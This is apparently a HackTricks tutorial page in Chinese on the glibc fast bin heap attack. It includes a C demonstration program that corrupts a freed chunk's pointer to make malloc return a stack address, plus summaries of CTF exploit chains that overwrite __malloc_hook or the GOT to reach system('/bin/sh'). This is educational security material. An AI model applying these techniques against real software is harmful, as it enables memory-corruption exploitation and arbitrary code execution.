Fast Bin Attack

学习并练习 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习并练习 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

基本信息

有关快速 Bin 的更多信息,请查看此页面:

Bins & Memory Allocations

由于快速 Bin 是一个单链表,与其他 Bin 相比,保护措施要少得多,只需修改释放的快速 Bin 块中的地址就足以在任何内存地址后分配一个块

总结如下:

ptr0 = malloc(0x20);
ptr1 = malloc(0x20);

// Put them in fast bin (suppose tcache is full)
free(ptr0)
free(ptr1)

// Use-after-free
// Modify the address where the free chunk of ptr1 is pointing
*ptr1 = (unsigned long)((char *)&<address>);

ptr2 = malloc(0x20); // This will get ptr1
ptr3 = malloc(0x20); // This will get a chunk in the <address> which could be abuse to overwrite arbitrary content inside of it

您可以在https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html找到一个非常详细解释的代码示例:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
puts("Today we will be discussing a fastbin attack.");
puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");

puts("Let's start, we will allocate three chunks of size 0x30\n");
unsigned long *ptr0, *ptr1, *ptr2;

ptr0 = malloc(0x30);
ptr1 = malloc(0x30);
ptr2 = malloc(0x30);

printf("Chunk 0: %p\n", ptr0);
printf("Chunk 1: %p\n", ptr1);
printf("Chunk 2: %p\n\n", ptr2);


printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");

int stackVar = 0x55;

printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);

printf("Proceeding that I'm going to write just some data to the three heap chunks\n");

char *data0 = "00000000";
char *data1 = "11111111";
char *data2 = "22222222";

memcpy(ptr0, data0, 0x8);
memcpy(ptr1, data1, 0x8);
memcpy(ptr2, data2, 0x8);

printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");

printf("Chunk 0: %s\n", (char *)ptr0);
printf("Chunk 1: %s\n", (char *)ptr1);
printf("Chunk 2: %s\n\n", (char *)ptr2);

printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");

free(ptr0);
free(ptr1);
free(ptr2);

printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);

printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");


printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");

*ptr1 = (unsigned long)((char *)&stackVar);

printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);


printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");

unsigned long *ptr3, *ptr4, *ptr5;

ptr3 = malloc(0x30);
ptr4 = malloc(0x30);
ptr5 = malloc(0x30);

printf("Chunk 3: %p\n", ptr3);
printf("Chunk 4: %p\n", ptr4);
printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);

printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
}

如果可以覆盖全局变量 global_max_fast 的值为一个大数,这将允许生成更大尺寸的 fast bin chunks,潜在地允许在以前不可能的情况下执行 fast bin 攻击。这种情况在 large bin attackunsorted bin attack 的情境中非常有用。

示例

  • 可以分配块,释放它们,读取它们的内容并填充它们(利用溢出漏洞)。

  • Consolidate chunk for infoleak: 该技术基本上是利用溢出来创建一个假的 prev_size,使一个先前的块被放入一个更大的块中,因此在分配包含另一个块的更大块时,可以打印它的数据并泄漏到 libc 的地址(main_arena+88)。

  • Overwrite malloc hook: 通过利用前一个重叠的情况,有可能有两个指向相同内存的块。因此,释放它们两个(在中间释放另一个块以避免保护),就有可能将同一个块放入 fast bin 两次。然后,可以再次分配它,覆盖下一个块的地址,指向 __malloc_hook 之前的位置(这样它指向 malloc 认为是空闲大小的整数 - 另一个绕过),再次分配它,然后分配另一个块,该块将接收一个地址到 malloc 钩子。 最后在其中写入一个 one gadget

  • 存在堆溢出和使用后释放以及双重释放,因为当释放一个块时,可以重用并重新释放指针。

  • Libc info leak: 只需释放一些块,它们将获得指向主要 arena 位置的指针。由于可以重用已释放的指针,只需读取此地址即可。

  • Fast bin attack: 所有分配的指针都存储在一个数组中,因此我们可以释放几个 fast bin 块,在最后一个块中覆盖地址,指向这些指针数组之前的位置。然后,分配几个相同大小的块,我们将首先获得合法的块,然后获得包含指针数组的伪造块。现在可以覆盖此分配指针,使得 free 的 GOT 地址指向 system,然后在块 1 中写入 "/bin/sh",然后调用 free(chunk1),而不是执行 system("/bin/sh")

  • 利用一个字节溢出来滥用未排序的块以获取 libc 信息泄漏,然后执行 fast bin 攻击以用 one gadget 地址覆盖 malloc 钩子

  • 在利用未排序块的 UAF 泄漏 libc 地址和 PIE 地址的信息泄漏后,此 CTF 的利用使用 fast bin 攻击在指向受控块的指针所在的位置分配一个块,因此可以覆盖某些指针以将一个 one gadget 写入 GOT

  • 您可以找到通过未排序块攻击滥用的 Fast Bin 攻击:

  • 请注意,在执行 fast bin 攻击之前,滥用自由列表以泄漏 libc/堆地址(如果需要)是很常见的。

  • 我们只能分配大于 0x100 的尺寸的块。

  • 使用未排序块攻击覆盖 global_max_fast(由于 ASLR,这只有 1/16 的成功率,因为我们需要修改 12 位,但必须修改 16 位)。

  • Fast Bin 攻击以修改全局块数组。这提供了一个任意读/写原语,允许修改 GOT 并将某些函数指向 system

Unsorted Bin Attack

学习并练习 AWS 黑客技能:HackTricks 培训 AWS 红队专家 (ARTE) 学习并练习 GCP 黑客技能:HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

Last updated